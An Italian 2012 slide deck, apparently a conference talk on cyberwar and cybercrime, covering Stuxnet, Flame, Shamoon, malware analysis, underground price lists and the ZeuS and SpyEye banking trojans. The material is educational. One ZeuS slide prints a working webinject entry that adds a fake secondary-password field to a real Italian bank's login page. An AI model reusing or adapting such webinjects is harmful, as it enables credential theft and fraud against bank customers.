Crimini Informatici 2012

Crimini Informatici 2012Indagini Digitali in ambito Giudiziario e Forense

Terrorismo, spionaggio ed esercito di botnet. La cyberguerra è già in atto. Le sofisticate armi digitali, accuratamente progettate per colpire obiettivi specifici, rappresentano la minaccia più preoccupante che sia stata mai affrontata.

Who is?

● Author: Gianni Amato● Site: www.securityside.it● Blog: www.gianniamato.it● Email: [email protected]● Twitter: @guelfoweb

IT Security and Forensics Consultant. Specialized in Cybercrime Intelligence for Internet Industry and Government Agencies.

Cosa è il Cybercrime

● Un crimine come tutti gli altri, con l'aggiunta della componente informatica

● La componente informatica può essere il mezzo o l'obiettivo del crimine (o entrambi)

Cominciamo dalla Cyberwar

L'apocalisseCosa comporterebbe un ipotetico cyber attacco alle infrastrutture critiche

✔ Prenotazioni online di treni e aerei bloccate✔ Sistemi di controllo di linee aeree e treni in tilt✔ Le comunicazioni email interrotte✔ Caos nelle Pubbliche Amministrazioni✔ Raffinerie e Oleodotti fuori controllo✔ Acqua, gas, rete elettrica fuori uso

Terrorismo?

● Si, è importante prestare attenzione a tutte le forme di terrorismo. In particolare al terrorismo psicologico.

Impossibile che accada?

● No, la Cyberwar è già iniziata. Una guerra digitale tra nazioni notoriamente in contrasto.

– 2010: Stuxnet

– 2011: Duqu

– 2011: Gauss

– 2012: Mahdi

– 2012: Flame

– 2012: Wiper

– 2012: Shamoon

Chi potrebbero essere gli artefici?

● Chiunque!– Dai servizi segreti ai gruppi di estremisti

– Dai militari ai terroristi

– Nazioni in contrasto da anni

2010: Stuxnet

● Scoperto nel giugno 2010● Obiettivo: Sabotare il programma nucleare

Iraniano– Sistemi SCADA

● Windows + WinCC + PCS 7

● Progetto USA “Operation Olympic Games” iniziato da George W. Bush

– Si diffonde via USB

– Sfrutta vulnerabilità 0-day

2010: Stuxnet

● La password dei sistemi SCADA (DB WinCC) era conosciuta da oltre 2 anni. Fu pubblicata in un forum e poi rimossa dal moderatore

● Gli autori erano in possesso di certificati digitali: Realtek e JMicron

● Verisign revoca i certificati il 16 luglio● Il 17 luglio viene rilevata una nuova versione

di Stuxnet con i certificati rubati a Jmicron

2010: Stuxnet

● Il valore numerico '1979050' trovato nel registro di sistema delle macchine compromesse da Stuxnet è stato interpretato

come la possibile data di nascita di uno degli autori: 09/05/1979

● E' stato appurato che la data rilevata all'interno del codice di Stuxnet '24/6/12' coincide esattamente con la data del suo decesso

2011: Duqu

● Scoperto nel settembre 2011● Condivide codice di Stuxnet (?)● Il target ancora una volta è l'Iran: valutare lo

stato del programma nucleare● Obiettivo diverso: furto di informazioni● Utilizza certificati rubati● Ha funzioni di keylogger● Sfrutta vulnerabilità 0-day (kernel Windows)

2011: Gauss

● Scoperto nel settembre 2011● Rilevato in Libano, Israele, Palestina, Stati

Uniti e Emirati Arabi● Obiettivo: furto di password e conti bancari● Si ipotizza sia stato creato dagli stessi autori

di Stuxnet e Duqu

2012: Mahdi

● Scoperto nel febbraio 2012● Il nome deriva da stringhe trovate nel codice

che fanno riferimento al Messia Islamico● Non si conoscono gli autori● Ha funzioni di keylogger e cattura schermate● Ruba file audio, file di testo e immagini● Sfrutta bug di Word e Power Point

2012: Flame

● Scoperto nell'aprile 2012● Individuato da Kaspersky Lab in Iran (Iranian

Oil Minestry● CrySyS Lab sostiene che il malware potrebbe

essere online dal 2007● Si propaga tramite USB Key, nella rete locale

grazie ad una vulnerabilità di Windows nei sistemi con stampante condivisa

● Usa un falso certificato digitale

2012: Flame

● Ha funzioni di keylogger● Cattura immagini● Registra l'audio (conversazioni via Skype)● Ruba documenti di testo e file DWG (Progetti

AutoCad)● Rilevate somiglianze con Stuxnet e Duqu ma

con un obiettivo diverso: spionaggio industriale

2012: Flame risale al 2008?http://www.crysys.hu/skywiper/skywiper.pdf

● $ python peframe.py --export mssecmgr.ocx

● [IMAGE_EXPORT_DIRECTORY]

● 0x5F694 0x0 Characteristics: 0x0

● 0x5F698 0x4 TimeDateStamp: 0x493EA336 [Tue Dec 9 16:56:22 2008 UTC]

● 0x5F69C 0x8 MajorVersion: 0x0

● 0x5F69E 0xA MinorVersion: 0x0

● 0x5F6A0 0xC Name: 0x13C4EE

● 0x5F6A4 0x10 Base: 0x1

● 0x5F6A8 0x14 NumberOfFunctions: 0x5

● 0x5F6AC 0x18 NumberOfNames: 0x5

● 0x5F6B0 0x1C AddressOfFunctions: 0x13C4BC

● 0x5F6B4 0x20 AddressOfNames: 0x13C4D0

● 0x5F6B8 0x24 AddressOfNameOrdinals: 0x13C4E4

2012: Wiper

● Un soldato inviato sul campo di battaglia per ripulire le tracce

● Ha lo scopo di cancellare tutte le tracce lasciate da Stuxnet e Duqu

● La priorità di rimuovere le informazioni è data ai file .PNF (usati da Stuxnet)

● Rimuove inoltre tutti dati utili ai tecnici forensi (non è un caso)

2012: Shamoon

● Scoperto nel mese di agosto 2012● Shamoon è il nome trovato nel codice● Progettato per lo spionaggio● Ha preso di mira un ente petrolifero di Stato

Saudita● Cancella i dati del pc infetto sostituendoli con

delle immagini (una bandiera americana)● I file originali vengono verso un server

sconosciuto

Perchè analizzare un Malware?

L'analisi è una procedura che va eseguita in laboratorio - quando è possibile - e consente di ricostruire la logica del malware per rispondere ai quattro quesiti che si presentano quando una macchina viene compromessa.

I 4 Quesiti

● 1. Qual è lo scopo del malware? ● 2. Quali informazioni è riuscito a carpire? ● 3. Dove sono state trasmesse le informazioni? ● 4. Come ha fatto ad arrivare fin qui?

Con cosa abbiamo a che fare?

● Persone altamente competenti● Codice è offuscato● Crittorgrafia (soprattutto durante la

trasmissione dei dati)● Funzioni di rootkit● Vulnerabilità 0-day

Tipi di Analisi

● Analisi Statica– Codice

– Signature

– Evidence

● Analisi Dinamica– Comportamento

– Mutazioni

– Connessioni

Remote Access Trojan

Malware Anti-Analysis

● Anti Online-Analysis– ThreatExpert– CWSandbox– Anubis

● Anti Virtualizzation– VMware– Virtualbox– Virtual PC

● Anti Debug/Disass.– Softice– OllyDbg– IDA Pro

Torniamo al Cybercrime

Vulnerabilità Condivise

Acquisti nell'Underground Russo

● Hacking a Gmail account: $162● Hacking a corporate mailbox: $500)● Scans of legitimate passports: $5 each● Winlocker ransomware: $10-20● Unintelligent exploit bundle: $25● Intelligent exploit bundle: $10-3,000● Traffic: $7-15 per 1,000 visitors for the most

valuable traffic (from the US and EU)

Acquisti nell'Underground Russo

● Basic crypter (for inserting rogue code into a benign file): $10-30

● SOCKS bot (to get around firewalls): $100● Hiring a DDoS attack: $30-70 for a day,

$1,200 for a month● Email spam: $10 per one million e-mails● Expensive email spam (using a customer

database): $50-500 per one million e-mails

Acquisti nell'Underground Russo

● SMS spam: $3-150 per 100-100,000 messages

● Bots for a botnet: $200 for 2,000 bots● DDoS botnet: $700● ZeuS source code: $200-$500● Windows rootkit (for installing malicious

drivers): $292● Hacking a Facebook or Twitter account: $130

ZeuSUn progetto criminale (ora) Open Source

ZeuS Info

● Online dal 2006● Scritto in Visual C++● Gli autori non amano chiamarlo Trojan,

Backdoor o Virus. Lo chiamano semplicemente “Bot”

● Prende di mira i sistemi MS Windows● Basato sulle intercettazioni delle WinAPI

ZeuS Ring

● Ring3– Garantisce adattabilità e scalabilità

– Può operare in Guest User

ZeuS Client Features

● Sniffer di traffico su protocollo TCP● Intercettazione di login FTP● Intercettazione di login POP3● Intercetta le chiamate alla libreria Wininet.dll

(usata da Internet Explorer) e nspr4.dll (usata da Firefox) per connessioni HTTP e HTTPS

● Encryption 1024-bit RSA

ZeuS Server Features

● Usa Socks 4/4a/5 con supporto UDP e IPv6● Connessioni alla macchina infetta via FTP o

RDP● Screenshot in real time● Esecuzione comandi da remoto

ZeuS HTTP-inject/HTTP-grabberwebinjects.txt

set_url https://privati.internetbanking.bancaintesa.it/sm/login/IN/box_login.jsp GP

data_beforename="PASSWORD"*<tr>

data_enddata_inject

<td height="32" class="grigio10">password dispositiva <br/><input name="PASSDIS" type="password" size="12" onkeypress="javascript:entsub('PASSWORD', event);" tabindex="2" style="width: 110px;"/></td><td><img alt="" src="/static/i/spaziatore.gif" width="10"/></td>

data_enddata_afterdata_end

ZeuS HTTP-inject/HTTP-grabberBefore - After

ZeuS Installation

✔Apache✔PHP✔MySql

ZeuS Control Panel

ZeuS Botnet

Arriva la Concorrenza

La prima versione di SpyEye con opzione Kill ZeusNato per accaparrarsi una fetta del mercato di ZeuS

SpyEye

● Presente dal 2009● Progettato dai Russi● Ha un costo di 500$ al mercato nero● Il business maggiore è basato sui plugin

SpyEye + ZeuS

● Brute force password guessing● Jabber notification● VNC module● Auto-spreading● Auto-update● Screenshot system

Domande?